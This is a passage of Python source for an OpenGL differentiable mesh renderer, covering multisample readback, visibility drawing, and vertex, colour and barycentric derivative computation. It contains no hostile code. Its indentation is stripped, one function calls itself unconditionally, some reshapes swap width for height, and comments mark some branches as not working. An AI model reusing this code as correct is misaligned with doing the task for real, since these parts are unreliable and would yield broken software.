GL.glBindTexture(GL.GL_TEXTURE_2D, texture)
GL.glUniform1i(self.textureObjLoc, 0)
GL.glUniformMatrix4fv(self.MVP_texture_location, 1, GL.GL_TRUE, MVP)
GL.glDrawArrays(primtype, 0, len(vbo_f) * vbo_f.data.shape[1])
# # #Background cube:
# GL.glBindVertexArray(self.vao_bgCube)
# self.vbo_f_bgCube.bind()
# texture = self.whitePixelTextureID
# self.vbo_uvs_cube.bind()
#
# GL.glActiveTexture(GL.GL_TEXTURE0)
# GL.glBindTexture(GL.GL_TEXTURE_2D, texture)
# GL.glUniform1i(self.textureObjLoc, 0)
# GL.glUniformMatrix4fv(self.MVP_texture_location, 1, GL.GL_TRUE, MVP)
#
# GL.glDrawElements(primtype, len(self.vbo_f_bgCube)*self.vbo_f_bgCube.data.shape[1], GL.GL_UNSIGNED_INT, None)
# self.draw_visibility_image_ms(self.v, self.f)
# GL.glBindFramebuffer(GL.GL_FRAMEBUFFER, 0)
#
# GL.glBindFramebuffer(GL.GL_READ_FRAMEBUFFER, self.fbo_ms_errors)
# GL.glFramebufferTexture2D(GL.GL_READ_FRAMEBUFFER, GL.GL_COLOR_ATTACHMENT0, GL.GL_TEXTURE_2D_MULTISAMPLE, self.texture_errors_render, 0)
# GL.glReadBuffer(GL.GL_COLOR_ATTACHMENT0)
# GL.glBindFramebuffer(GL.GL_DRAW_FRAMEBUFFER, self.fbo_errors_nonms)
# GL.glDrawBuffer(GL.GL_COLOR_ATTACHMENT0)
# GL.glBlitFramebuffer(0, 0, self.frustum['width'], self.frustum['height'], 0, 0, self.frustum['width'], self.frustum['height'],GL.GL_COLOR_BUFFER_BIT, GL.GL_NEAREST)
# GL.glBindFramebuffer(GL.GL_READ_FRAMEBUFFER, self.fbo_errors_nonms)
# GL.glReadBuffer(GL.GL_COLOR_ATTACHMENT0)
# # result_blit = np.flipud(np.frombuffer(GL.glReadPixels(0, 0, self.frustum['width'], self.frustum['height'], GL.GL_RGB, GL.GL_UNSIGNED_BYTE), np.uint8).reshape(self.frustum['height'], self.frustum['height'], 3)[:,:,0:3].astype(np.float64))
# result_blit2 = np.flipud(np.frombuffer(GL.glReadPixels(0, 0, self.frustum['width'], self.frustum['height'], GL.GL_RGB, GL.GL_FLOAT), np.float32).reshape(self.frustum['height'], self.frustum['height'], 3)[:,:,0:3].astype(np.float64))
#
# GL.glBindFramebuffer(GL.GL_READ_FRAMEBUFFER, self.fbo_ms_errors)
# GL.glFramebufferTexture2D(GL.GL_READ_FRAMEBUFFER, GL.GL_COLOR_ATTACHMENT1, GL.GL_TEXTURE_2D_MULTISAMPLE, self.texture_errors_sample_position, 0)
# GL.glReadBuffer(GL.GL_COLOR_ATTACHMENT1)
# GL.glBindFramebuffer(GL.GL_DRAW_FRAMEBUFFER, self.fbo_errors_nonms)
# GL.glDrawBuffer(GL.GL_COLOR_ATTACHMENT1)
# GL.glBlitFramebuffer(0, 0, self.frustum['width'], self.frustum['height'], 0, 0, self.frustum['width'], self.frustum['height'],GL.GL_COLOR_BUFFER_BIT, GL.GL_NEAREST)
# GL.glBindFramebuffer(GL.GL_READ_FRAMEBUFFER, self.fbo_errors_nonms)
# GL.glReadBuffer(GL.GL_COLOR_ATTACHMENT1)
# result_blit_pos = np.flipud(np.frombuffer(GL.glReadPixels(0, 0, self.frustum['width'], self.frustum['height'], GL.GL_RGB, GL.GL_FLOAT), np.float32).reshape(self.frustum['height'], self.frustum['height'], 3)[:,:,0:3].astype(np.float64))
GL.glUseProgram(self.fetchSamplesProgram)
# GL.glDisable(GL.GL_MULTISAMPLE)
self.colorsLoc = GL.glGetUniformLocation(self.fetchSamplesProgram, "colors")
self.sample_positionsLoc = GL.glGetUniformLocation(self.fetchSamplesProgram, "sample_positions")
self.sample_facesLoc = GL.glGetUniformLocation(self.fetchSamplesProgram, "sample_faces")
self.sample_barycentric1Loc = GL.glGetUniformLocation(self.fetchSamplesProgram, "sample_barycentric_coords1")
self.sample_barycentric2Loc = GL.glGetUniformLocation(self.fetchSamplesProgram, "sample_barycentric_coords2")
# GL.glClear(GL.GL_COLOR_BUFFER_BIT | GL.GL_DEPTH_BUFFER_BIT)
# GL.glActiveTexture(GL.GL_TEXTURE2)
# GL.glBindTexture(GL.GL_TEXTURE_2D_MULTISAMPLE, self.texture_errors_sample_face)
# GL.glUniform1i(self.sample_facesLoc, 2)
wwLoc = GL.glGetUniformLocation(self.fetchSamplesProgram, 'ww')
whLoc = GL.glGetUniformLocation(self.fetchSamplesProgram, 'wh')
GL.glUniform1f(wwLoc, self.frustum['width'])
GL.glUniform1f(whLoc, self.frustum['height'])
self.renders = np.zeros([self.nsamples, self.frustum['width'], self.frustum['height'], 3])
self.renders_sample_pos = np.zeros([self.nsamples, self.frustum['width'], self.frustum['height'], 2])
self.renders_faces = np.zeros([self.nsamples, self.frustum['width'], self.frustum['height']]).astype(np.uint32)
self.renders_sample_barycentric1 = np.zeros([self.nsamples, self.frustum['width'], self.frustum['height'], 2])
self.renders_sample_barycentric2 = np.zeros([self.nsamples, self.frustum['width'], self.frustum['height'], 1])
self.renders_sample_barycentric = np.zeros([self.nsamples, self.frustum['width'], self.frustum['height'], 3])
GL.glDisable(GL.GL_DEPTH_TEST)
GL.glBindFramebuffer(GL.GL_DRAW_FRAMEBUFFER, self.fbo_sample_fetch)
drawingBuffers = [GL.GL_COLOR_ATTACHMENT0, GL.GL_COLOR_ATTACHMENT1, GL.GL_COLOR_ATTACHMENT2, GL.GL_COLOR_ATTACHMENT3,
GL.GL_COLOR_ATTACHMENT4]
GL.glDrawBuffers(5, drawingBuffers)
GL.glClearColor(0., 0., 0., 0.)
GL.glClear(GL.GL_COLOR_BUFFER_BIT | GL.GL_DEPTH_BUFFER_BIT)
for sample in np.arange(self.nsamples):
sampleLoc = GL.glGetUniformLocation(self.fetchSamplesProgram, 'sample')
GL.glUniform1i(sampleLoc, sample)
GL.glActiveTexture(GL.GL_TEXTURE0)
GL.glBindTexture(GL.GL_TEXTURE_2D_MULTISAMPLE, self.texture_errors_render)
GL.glUniform1i(self.colorsLoc, 0)
GL.glActiveTexture(GL.GL_TEXTURE1)
GL.glBindTexture(GL.GL_TEXTURE_2D_MULTISAMPLE, self.texture_errors_sample_position)
GL.glUniform1i(self.sample_positionsLoc, 1)
GL.glActiveTexture(GL.GL_TEXTURE2)
GL.glBindTexture(GL.GL_TEXTURE_2D_MULTISAMPLE, self.texture_errors_sample_faces)
GL.glUniform1i(self.sample_facesLoc, 2)
GL.glActiveTexture(GL.GL_TEXTURE3)
GL.glBindTexture(GL.GL_TEXTURE_2D_MULTISAMPLE, self.texture_errors_sample_barycentric1)
GL.glUniform1i(self.sample_barycentric1Loc, 3)
GL.glActiveTexture(GL.GL_TEXTURE4)
GL.glBindTexture(GL.GL_TEXTURE_2D_MULTISAMPLE, self.texture_errors_sample_barycentric2)
GL.glUniform1i(self.sample_barycentric2Loc, 4)
GL.glBindVertexArray(self.vao_quad)
GL.glDrawArrays(GL.GL_POINTS, 0, 1)
# GL.glBindVertexArray(self.vao_bgCube)
# # self.vbo_f_bgCube.bind()
# GL.glUniformMatrix4fv(self.MVP_texture_location, 1, GL.GL_TRUE, MVP)
#
# GL.glDrawElements(primtype, len(self.vbo_f_bgCube) * self.vbo_f_bgCube.data.shape[1], GL.GL_UNSIGNED_INT, None)
GL.glBindFramebuffer(GL.GL_READ_FRAMEBUFFER, self.fbo_sample_fetch)
GL.glReadBuffer(GL.GL_COLOR_ATTACHMENT0)
result = np.flipud(
np.frombuffer(GL.glReadPixels(0, 0, self.frustum['width'], self.frustum['height'], GL.GL_RGB, GL.GL_FLOAT), np.float32).reshape(
self.frustum['height'], self.frustum['height'], 3)[:, :, 0:3].astype(np.float64))
self.renders[sample] = result
GL.glReadBuffer(GL.GL_COLOR_ATTACHMENT1)
result = np.flipud(
np.frombuffer(GL.glReadPixels(0, 0, self.frustum['width'], self.frustum['height'], GL.GL_RGB, GL.GL_FLOAT), np.float32).reshape(
self.frustum['height'], self.frustum['height'], 3)[:, :, 0:2].astype(np.float64))
self.renders_sample_pos[sample] = result
GL.glReadBuffer(GL.GL_COLOR_ATTACHMENT2)
result = np.flipud(
np.frombuffer(GL.glReadPixels(0, 0, self.frustum['width'], self.frustum['height'], GL.GL_RED_INTEGER, GL.GL_UNSIGNED_INT),
np.uint32).reshape(self.frustum['height'], self.frustum['height'])[:, :].astype(np.uint32))
self.renders_faces[sample] = result
GL.glReadBuffer(GL.GL_COLOR_ATTACHMENT3)
result = np.flipud(
np.frombuffer(GL.glReadPixels(0, 0, self.frustum['width'], self.frustum['height'], GL.GL_RGB, GL.GL_FLOAT), np.float32).reshape(
self.frustum['height'], self.frustum['height'], 3)[:, :, 0:2].astype(np.float64))
self.renders_sample_barycentric1[sample] = result
GL.glReadBuffer(GL.GL_COLOR_ATTACHMENT4)
result = np.flipud(
np.frombuffer(GL.glReadPixels(0, 0, self.frustum['width'], self.frustum['height'], GL.GL_RGB, GL.GL_FLOAT), np.float32).reshape(
self.frustum['height'], self.frustum['height'], 3)[:, :, 0:1].astype(np.float64))
self.renders_sample_barycentric2[sample] = result
self.renders_sample_barycentric[sample] = np.concatenate(
[self.renders_sample_barycentric1[sample], self.renders_sample_barycentric2[sample][:, :, 0:1]], 2)
# GL.glClear(GL.GL_COLOR_BUFFER_BIT | GL.GL_DEPTH_BUFFER_BIT)
# GL.glReadBuffer(GL.GL_COLOR_ATTACHMENT2)
# result = np.flipud(np.frombuffer(GL.glReadPixels(0, 0, self.frustum['width'], self.frustum['height'], GL.GL_RGB, GL.GL_FLOAT), np.float32).reshape(self.frustum['height'], self.frustum['height'], 3)[:,:,0:3].astype(np.float64))
# self.renders_faces[sample] = result
GL.glBindVertexArray(0)
GL.glClearColor(0., 0., 0., 1.)
GL.glEnable(GL.GL_DEPTH_TEST)
GL.glDisable(GL.GL_MULTISAMPLE)
##Finally return image and derivatives
self.render_resolved = np.mean(self.renders, 0)
self.updateRender = True
self.updateDerivatives_verts = True
self.updateDerivatives_vc = True
def draw_visibility_image_ms(self, v, f):
"""Assumes camera is set up correctly in"""
GL.glUseProgram(self.visibilityProgram_ms)
v = np.asarray(v)
self.draw_visibility_image_ms(v, f)
# Attach FBO
GL.glClear(GL.GL_COLOR_BUFFER_BIT | GL.GL_DEPTH_BUFFER_BIT)
fc = np.arange(1, len(f) + 1)
fc = np.tile(fc.reshape((-1, 1)), (1, 3))
fc[:, 0] = fc[:, 0] & 255
fc[:, 1] = (fc[:, 1] >> 8) & 255
fc[:, 2] = (fc[:, 2] >> 16) & 255
fc = np.asarray(fc, dtype=np.uint8)
self.draw_colored_primitives_ms(self.vao_dyn_ub, v, f, fc)
# this assumes that fc is either "by faces" or "verts by face", not "by verts"
def draw_colored_primitives_ms(self, vao, v, f, fc=None):
# gl.EnableClientState(GL_VERTEX_ARRAY)
verts_by_face = np.asarray(v.reshape((-1, 3))[f.ravel()], dtype=np.float64, order='C')
# gl.VertexPointer(verts_by_face)
GL.glBindVertexArray(vao)
self.vbo_verts_dyn.set_array(verts_by_face.astype(np.float32))
self.vbo_verts_dyn.bind()
if fc is not None:
# gl.EnableClientState(GL_COLOR_ARRAY)
if fc.size == verts_by_face.size:
vc_by_face = fc
else:
vc_by_face = np.repeat(fc, f.shape[1], axis=0)
if vc_by_face.size != verts_by_face.size:
raise Exception('fc must have either rows=(#rows in faces) or rows=(# elements in faces)')
vc_by_face = np.asarray(vc_by_face, dtype=np.uint8, order='C')
self.vbo_colors_ub.set_array(vc_by_face)
self.vbo_colors_ub.bind()
primtype = GL.GL_TRIANGLES
self.vbo_indices_dyn.set_array(np.arange(f.size, dtype=np.uint32).ravel())
self.vbo_indices_dyn.bind()
GL.glBindFramebuffer(GL.GL_DRAW_FRAMEBUFFER, self.fbo_ms_errors)
drawingBuffers = [GL.GL_COLOR_ATTACHMENT2]
GL.glDrawBuffers(1, drawingBuffers)
view_mtx = self.camera.openglMat.dot(np.asarray(np.vstack((self.camera.view_matrix, np.array([0, 0, 0, 1]))), np.float32))
GL.glUniformMatrix4fv(self.MVP_location, 1, GL.GL_TRUE, np.dot(self.projectionMatrix, view_mtx))
GL.glDisable(GL.GL_DEPTH_TEST)
GL.glDrawElements(primtype, len(self.vbo_indices_dyn), GL.GL_UNSIGNED_INT, None)
GL.glEnable(GL.GL_DEPTH_TEST)
def compute_dr_wrt(self, wrt):
visibility = self.visibility_image
if wrt is self.camera:
derivatives_verts = self.get_derivatives_verts()
return derivatives_verts
elif wrt is self.vc:
derivatives_vc = self.get_derivatives_vc()
return derivatives_vc
# Not working atm.:
elif wrt is self.bgcolor:
return 2. * (self.imageGT.r - self.render_image).ravel() * common.dr_wrt_bgcolor(visibility, self.frustum, num_channels=self.num_channels)
# Not working atm.:
elif wrt is self.texture_stack:
IS = np.nonzero(self.visibility_image.ravel() != 4294967295)[0]
texcoords, texidx = self.texcoord_image_quantized
vis_texidx = texidx.ravel()[IS]
vis_texcoords = texcoords.ravel()[IS]
JS = vis_texcoords * np.tile(col(vis_texidx), [1, 2]).ravel()
clr_im = -2. * (self.imageGT.r - self.render_image) * self.renderWithoutTexture
if False:
cv2.imshow('clr_im', clr_im)
# cv2.imshow('texmap', self.texture_image.r)
cv2.waitKey(1)
r = clr_im[:, :, 0].ravel()[IS]
g = clr_im[:, :, 1].ravel()[IS]
b = clr_im[:, :, 2].ravel()[IS]
data = np.concatenate((r, g, b))
IS = np.concatenate((IS * 3, IS * 3 + 1, IS * 3 + 2))
JS = np.concatenate((JS * 3, JS * 3 + 1, JS * 3 + 2))
return sp.csc_matrix((data, (IS, JS)), shape=(self.r.size, wrt.r.size))
return None
def compute_r(self):
return self.render()
@depends_on(dterms + terms)
def renderWithoutColor(self):
self._call_on_changed()
return self.render_nocolor
@depends_on(dterms + terms)
def renderWithoutTexture(self):
self._call_on_changed()
return self.render_notexture
# @depends_on(dterms+terms)
def render(self):
self._call_on_changed()
visibility = self.visibility_image
visible = np.nonzero(visibility.ravel() != 4294967295)[0]
if self.updateRender:
render, residuals = self.compute_image(visible, visibility, self.f)
self.render_result = render
self.residuals_result = residuals
self.updateRender = False
if self.imageGT is None:
returnResult = self.render_result
else:
returnResult = self.residuals_result
return returnResult
def get_derivatives_verts(self):
self._call_on_changed()
visibility = self.visibility_image
color = self.render_resolved
visible = np.nonzero(visibility.ravel() != 4294967295)[0]
barycentric = self.barycentric_image
if self.updateDerivatives_verts:
if self.updateRender:
self.render()
derivatives_verts = self.compute_derivatives_verts(color, visible, visibility, barycentric, self.frustum['width'], self.frustum['height'],
self.v.r.size / 3, self.f)
self.derivatives_verts = derivatives_verts
self.updateDerivatives_verts = False
return self.derivatives_verts
def get_derivatives_vc(self):
self._call_on_changed()
visibility = self.visibility_image
color = self.render_resolved
visible = np.nonzero(visibility.ravel() != 4294967295)[0]
barycentric = self.barycentric_image
if self.updateDerivatives_vc:
if self.updateRender:
self.render()
derivatives_vc = self.compute_derivatives_vc(color, visible, visibility, barycentric, self.frustum['width'], self.frustum['height'],
self.v.r.size / 3, self.f)
self.derivatives_vc = derivatives_vc
self.updateDerivatives_vc = False
return self.derivatives_vc
# # @depends_on(dterms+terms)
# def image_and_derivatives(self):
# # self._call_on_changed()
# visibility = self.visibility_image
#
# color = self.render_resolved
#
# visible = np.nonzero(visibility.ravel() != 4294967295)[0]
# num_visible = len(visible)
#
# barycentric = self.barycentric_image
#
# if self.updateRender:
# render, derivatives = self.compute_image_and_derivatives(color, visible, visibility, barycentric, self.frustum['width'], self.frustum['height'], self.v.r.size / 3, self.f)
# self.render = render
# self.derivatives = derivatives
# self.updateRender = False
#
# return self.render, self.derivatives
#
def barycentricDerivatives(self, vertices, faces, verts):
import chumpy as ch
vertices = np.concatenate([vertices, np.ones([vertices.size // 3, 1])], axis=1)
view_mtx = np.r_[self.camera.view_mtx, np.array([[0, 0, 0, 1]])]
camMtx = np.r_[np.c_[self.camera.camera_mtx, np.array([0, 0, 0])], np.array([[0, 0, 0, 1]])]
verts_hom = np.concatenate([verts.reshape([-1, 3]), np.ones([verts.size // 3, 1])], axis=1)
# viewVerts = negYMat.dot(view_mtx.dot(verts_hom.T).T[:, :3].T).T.reshape([-1, 3])
projVerts = (camMtx.dot(view_mtx)).dot(verts_hom.T).T[:, :3].reshape([-1, 3])
viewVerticesNonBnd = camMtx[0:3, 0:3].dot(view_mtx.dot(vertices.T).T[:, :3].T).T.reshape([-1, 3, 3])
# # # Check with autodiff:
# #
# view_mtx = np.r_[self.camera.view_mtx, np.array([[0, 0, 0, 1]])]
# # negYMat = ch.array([[1,0,self.camera.c.r[0]],[0,-1,self.camera.c.r[1]],[0,0,1]])
# verts_hom_ch = ch.Ch(verts_hom)
# camMtx = ch.Ch(np.r_[np.c_[self.camera.camera_mtx, np.array([0, 0, 0])], np.array([[0, 0, 0, 1]])])
# projVerts = (camMtx.dot(view_mtx)).dot(verts_hom_ch.T).T[:, :3].reshape([-1, 3])
# viewVerts = ch.Ch(np.array(projVerts))
# projVerts = projVerts[:, :2] / projVerts[:, 2:3]
#
# chViewVerticesNonBnd = camMtx[0:3, 0:3].dot(view_mtx.dot(vertices.T).T[:, :3].T).T.reshape([-1, 3, 3])
# p0 = ch.Ch(viewVerticesNonBnd[:, 0, :])
# chp0 = p0
#
# p1 = ch.Ch(viewVerticesNonBnd[:, 1, :])
# chp1 = p1
#
# p2 = ch.Ch(viewVerticesNonBnd[:, 2, :])
# chp2 = p2
#
# # D = np.linalg.det(np.concatenate([(p3 - p1).reshape([nNonBndFaces, 1, 3]), (p1 - p2).reshape([nNonBndFaces, 1, 3])], axis=1))
# nt = ch.cross(p1 - p0, p2 - p0)
# chnt = nt
# A = 0.5 * ch.sqrt(ch.sum(nt ** 2, axis=1))
# chnt_norm = nt / ch.sqrt(ch.sum(nt ** 2, axis=1))[:, None]
# # nt = nt / A
#
# chb0part2 = ch.sum(ch.cross(chnt_norm, p2 - p1) * (viewVerts - p1), axis=1)
# chb0 = 0.5 * ch.sum(ch.cross(chnt_norm, p2 - p1) * (viewVerts - p1), axis=1) / A
# chb1part2 = ch.sum(ch.cross(chnt_norm, p0 - p2) * (viewVerts - p2), axis=1)
# chb1 = 0.5 * ch.sum(ch.cross(chnt_norm, p0 - p2) * (viewVerts - p2), axis=1) / A
# chb2part2 = ch.sum(ch.cross(chnt_norm, p1 - p0) * (viewVerts - p0), axis=1)
# chb2 = 0.5 * ch.sum(ch.cross(chnt_norm, p1 - p0) * (viewVerts - p0), axis=1) / A
#
# drb0p0 = chb0.dr_wrt(p0)
# drb0p1 = chb0.dr_wrt(p1)
# drb0p2 = chb0.dr_wrt(p2)
#
# drb1p0 = chb1.dr_wrt(p0)
# drb1p1 = chb1.dr_wrt(p1)
# drb1p2 = chb1.dr_wrt(p2)
#
# drb2p0 = chb2.dr_wrt(p0)
# drb2p1 = chb2.dr_wrt(p1)
# drb2p2 = chb2.dr_wrt(p2)
#
# rows = np.tile(np.arange(drb0p0.shape[0])[None, :], [3, 1]).T.ravel()
# cols = np.arange(drb0p0.shape[0] * 3)
#
# drb0p0 = np.array(drb0p0[rows, cols]).reshape([-1, 3])
# drb0p1 = np.array(drb0p1[rows, cols]).reshape([-1, 3])
# drb0p2 = np.array(drb0p2[rows, cols]).reshape([-1, 3])
# drb1p0 = np.array(drb1p0[rows, cols]).reshape([-1, 3])
# drb1p1 = np.array(drb1p1[rows, cols]).reshape([-1, 3])
# drb1p2 = np.array(drb1p2[rows, cols]).reshape([-1, 3])
# drb2p0 = np.array(drb2p0[rows, cols]).reshape([-1, 3])
# drb2p1 = np.array(drb2p1[rows, cols]).reshape([-1, 3])
# drb2p2 = np.array(drb2p2[rows, cols]).reshape([-1, 3])
#
# chdp0 = np.concatenate([drb0p0[:, None, :], drb1p0[:, None, :], drb2p0[:, None, :]], axis=1)
# chdp1 = np.concatenate([drb0p1[:, None, :], drb1p1[:, None, :], drb2p1[:, None, :]], axis=1)
# chdp2 = np.concatenate([drb0p2[:, None, :], drb1p2[:, None, :], drb2p2[:, None, :]], axis=1)
#
# dp = np.concatenate([dp0[:, :, None], dp1[:, :, None], dp2[:, :, None]], 2)
# dp = dp[None, :]
view_mtx = np.r_[self.camera.view_mtx, np.array([[0, 0, 0, 1]])]
camMtx = np.r_[np.c_[self.camera.camera_mtx, np.array([0, 0, 0])], np.array([[0, 0, 0, 1]])]
verts_hom = np.concatenate([verts.reshape([-1, 3]), np.ones([verts.size // 3, 1])], axis=1)
# viewVerts = negYMat.dot(view_mtx.dot(verts_hom.T).T[:, :3].T).T.reshape([-1, 3])
projVerts = (camMtx.dot(view_mtx)).dot(verts_hom.T).T[:, :3].reshape([-1, 3])
viewVerts = projVerts
projVerts = projVerts[:, :2] / projVerts[:, 2:3]
# viewVerticesNonBnd = negYMat.dot(view_mtx.dot(vertices.T).T[:, :3].T).T.reshape([-1, 3, 3])
p0 = viewVerticesNonBnd[:, 0, :]
p1 = viewVerticesNonBnd[:, 1, :]
p2 = viewVerticesNonBnd[:, 2, :]
p0_proj = p0[:, 0:2] / p0[:, 2:3]
p1_proj = p1[:, 0:2] / p1[:, 2:3]
p2_proj = p2[:, 0:2] / p2[:, 2:3]
# D = np.linalg.det(np.concatenate([(p3 - p1).reshape([nNonBndFaces, 1, 3]), (p1 - p2).reshape([nNonBndFaces, 1, 3])], axis=1))
nt = np.cross(p1 - p0, p2 - p0)
nt_norm = nt / np.linalg.norm(nt, axis=1)[:, None]
# a = -nt_norm[:, 0] / nt_norm[:, 2]
# b = -nt_norm[:, 1] / nt_norm[:, 2]
# c = np.sum(nt_norm * p0, 1) / nt_norm[:, 2]
cam_f = 1
u = p0[:, 0] / p0[:, 2]
v = p0[:, 1] / p0[:, 2]
# xudiv = (cam_f - a * u - b * v) ** 2
# xu = np.c_[c * (cam_f - b * v) / xudiv, a * v * c / xudiv, a * cam_f * c / xudiv]
# xv = np.c_[b * u * c / xudiv, c * (cam_f - a * u) / xudiv, b * cam_f * c / xudiv]
xu = np.c_[p0[:, 2][:, None], np.zeros([len(p0), 1]), (-p0[:, 0] / u ** 2)[:, None]]
xv = np.c_[np.zeros([len(p0), 1]), p0[:, 2][:, None], (-p0[:, 1] / v ** 2)[:, None]]
dxdp_0 = np.concatenate([xu[:, :, None], xv[:, :, None]], axis=2)
u = p1[:, 0] / p1[:, 2]
v = p1[:, 1] / p1[:, 2]
# xudiv = (cam_f - a * u - b * v) ** 2
# xu = np.c_[c * (cam_f - b * v) / xudiv, a * v * c / xudiv, a * cam_f * c / xudiv]
# xv = np.c_[b * u * c / xudiv, c * (cam_f - a * u) / xudiv, b * cam_f * c / xudiv]
xu = np.c_[p1[:, 2][:, None], np.zeros([len(p1), 1]), (-p1[:, 0] / u ** 2)[:, None]]
xv = np.c_[np.zeros([len(p1), 1]), p1[:, 2][:, None], (-p1[:, 1] / v ** 2)[:, None]]
dxdp_1 = np.concatenate([xu[:, :, None], xv[:, :, None]], axis=2)
u = p2[:, 0] / p2[:, 2]
v = p2[:, 1] / p2[:, 2]
# xudiv = (cam_f - a * u - b * v) ** 2
# xu = np.c_[c * (cam_f - b * v) / xudiv, a * v * c / xudiv, a * cam_f * c / xudiv]
# xv = np.c_[b * u * c / xudiv, c * (cam_f - a * u) / xudiv, b * cam_f * c / xudiv]
xu = np.c_[p2[:, 2][:, None], np.zeros([len(p2), 1]), (-p2[:, 0] / u ** 2)[:, None]]
xv = np.c_[np.zeros([len(p2), 1]), p2[:, 2][:, None], (-p2[:, 1] / v ** 2)[:, None]]
dxdp_2 = np.concatenate([xu[:, :, None], xv[:, :, None]], axis=2)
# x = u * c / (cam_f - a * u - b * v)
# y = v*c/(cam_f - a*u - b*v)
# z = c*cam_f/(cam_f - a*u - b*v)
A = 0.5 * np.linalg.norm(np.cross(p1 - p0, p2 - p0), axis=1)
nt_mag = A * 2
# nt = nt / A
# db1 = 0.5*np.cross(nt_norm, p2-p1)/A[:, None]
# db2 = 0.5*np.cross(nt_norm, p0-p2)/A[:, None]
# db3_2 = 0.5*np.cross(nt_norm, p1-p0)/A[:, None]
# db3 = - db1 - db2
p = viewVerts
pre1 = -1 / (nt_mag[:, None] ** 2) * nt_norm
ident = np.identity(3)
ident = np.tile(ident[None, :], [len(p2), 1, 1])
dntdp0 = np.cross((p2 - p0)[:, None, :], -ident) + np.cross(-ident, (p1 - p0)[:, None, :])
dntdp1 = np.cross((p2 - p0)[:, None, :], ident)
dntdp2 = np.cross(ident, (p1 - p0)[:, None, :])
# Pol check this!:
dntnorm = (ident - np.einsum('ij,ik->ijk', nt_norm, nt_norm)) / nt_mag[:, None, None]
# dntnorm = (ident - np.einsum('ij,ik->ijk',nt_norm,nt_norm))/nt_mag[:,None,None]
dntnormdp0 = np.einsum('ijk,ikl->ijl', dntnorm, dntdp0)
dntnormdp1 = np.einsum('ijk,ikl->ijl', dntnorm, dntdp1)
dntnormdp2 = np.einsum('ijk,ikl->ijl', dntnorm, dntdp2)
dpart1p0 = np.einsum('ij,ijk->ik', pre1, dntdp0)
dpart1p1 = np.einsum('ij,ijk->ik', pre1, dntdp1)
dpart1p2 = np.einsum('ij,ijk->ik', pre1, dntdp2)
b0 = np.sum(np.cross(nt_norm, p2 - p1) * (p - p1), axis=1)[:, None]
db0part2p0 = np.einsum('ikj,ij->ik', np.cross(dntnormdp0.swapaxes(1, 2), (p2 - p1)[:, None, :]), p - p1)
# db0part2p1 = np.einsum('ikj,ij->ik',np.cross((p2 - p1)[:, None, :], dntnormdp0), p - p1) + np.einsum('ikj,ij->ik', np.cross(-ident,nt_norm[:, None, :]), p - p1) + np.einsum('ik,ikj->ik', np.cross(nt_norm[:, :], p2-p1),-ident)
# db0part2p1 = np.einsum('ikj,ij->ik',np.cross((p2 - p1)[:, None, :], dntnormdp0.swapaxes(1,2)), p - p1) + np.einsum('ikj,ij->ik', np.cross(-ident, nt_norm[:, None, :]), p - p1) + np.einsum('ik,ikj->ik', np.cross(p2-p1,nt_norm[:, :]),-ident)
db0part2p1 = np.einsum('ikj,ij->ik', np.cross(dntnormdp1.swapaxes(1, 2), (p2 - p1)[:, None, :]), p - p1) + np.einsum('ikj,ij->ik', np.cross(
nt_norm[:, None, :], -ident), p - p1) + np.einsum('ik,ikj->ik', np.cross(nt_norm[:, :], p2 - p1), -ident)
db0part2p2 = np.einsum('ikj,ij->ik', np.cross(dntnormdp2.swapaxes(1, 2), (p2 - p1)[:, None, :]), p - p1) + np.einsum('ikj,ij->ik', np.cross(
nt_norm[:, None, :], ident), p - p1)
db0dp0wrtpart1 = dpart1p0 * b0
db0dp1wrtpart1 = dpart1p1 * b0
db0dp2wrtpart1 = dpart1p2 * b0
db0dp0wrtpart2 = 1. / (nt_mag[:, None]) * db0part2p0
db0dp1wrtpart2 = 1. / (nt_mag[:, None]) * db0part2p1
db0dp2wrtpart2 = 1. / (nt_mag[:, None]) * db0part2p2
db0dp0wrt = db0dp0wrtpart1 + db0dp0wrtpart2
db0dp1wrt = db0dp1wrtpart1 + db0dp1wrtpart2
db0dp2wrt = db0dp2wrtpart1 + db0dp2wrtpart2
######
b1 = np.sum(np.cross(nt_norm, p0 - p2) * (p - p2), axis=1)[:, None]
db1part2p0 = np.einsum('ikj,ij->ik', np.cross(dntnormdp0.swapaxes(1, 2), (p0 - p2)[:, None, :]), p - p2) + np.einsum('ikj,ij->ik', np.cross(
nt_norm[:, None, :], ident), p - p2)
db1part2p1 = np.einsum('ikj,ij->ik', np.cross(dntnormdp1.swapaxes(1, 2), (p0 - p2)[:, None, :]), p - p2)
db1part2p2 = np.einsum('ikj,ij->ik', np.cross(dntnormdp2.swapaxes(1, 2), (p0 - p2)[:, None, :]), p - p2) + np.einsum('ikj,ij->ik', np.cross(
nt_norm[:, None, :], -ident), p - p2) + np.einsum('ik,ikj->ik', np.cross(nt_norm[:, :], p0 - p2), -ident)
db1dp0wrtpart1 = dpart1p0 * b1
db1dp1wrtpart1 = dpart1p1 * b1
db1dp2wrtpart1 = dpart1p2 * b1
db1dp0wrtpart2 = 1. / (nt_mag[:, None]) * db1part2p0
db1dp1wrtpart2 = 1. / (nt_mag[:, None]) * db1part2p1
db1dp2wrtpart2 = 1. / (nt_mag[:, None]) * db1part2p2
db1dp0wrt = db1dp0wrtpart1 + db1dp0wrtpart2
db1dp1wrt = db1dp1wrtpart1 + db1dp1wrtpart2
db1dp2wrt = db1dp2wrtpart1 + db1dp2wrtpart2
######
b2 = np.sum(np.cross(nt_norm, p1 - p0) * (p - p0), axis=1)[:, None]
db2part2p0 = np.einsum('ikj,ij->ik', np.cross(dntnormdp0.swapaxes(1, 2), (p1 - p0)[:, None, :]), p - p0) + np.einsum('ikj,ij->ik', np.cross(
nt_norm[:, None, :], -ident), p - p0) + np.einsum('ik,ikj->ik', np.cross(nt_norm[:, :], p1 - p0), -ident)
db2part2p1 = np.einsum('ikj,ij->ik', np.cross(dntnormdp1.swapaxes(1, 2), (p1 - p0)[:, None, :]), p - p0) + np.einsum('ikj,ij->ik', np.cross(
nt_norm[:, None, :], ident), p - p0)
db2part2p2 = np.einsum('ikj,ij->ik', np.cross(dntnormdp2.swapaxes(1, 2), (p1 - p0)[:, None, :]), p - p0)
db2dp0wrtpart1 = dpart1p0 * b2
db2dp1wrtpart1 = dpart1p1 * b2
db2dp2wrtpart1 = dpart1p2 * b2
db2dp0wrtpart2 = 1. / (nt_mag[:, None]) * db2part2p0
db2dp1wrtpart2 = 1. / (nt_mag[:, None]) * db2part2p1
db2dp2wrtpart2 = 1. / (nt_mag[:, None]) * db2part2p2
db2dp0wrt = db2dp0wrtpart1 + db2dp0wrtpart2
db2dp1wrt = db2dp1wrtpart1 + db2dp1wrtpart2
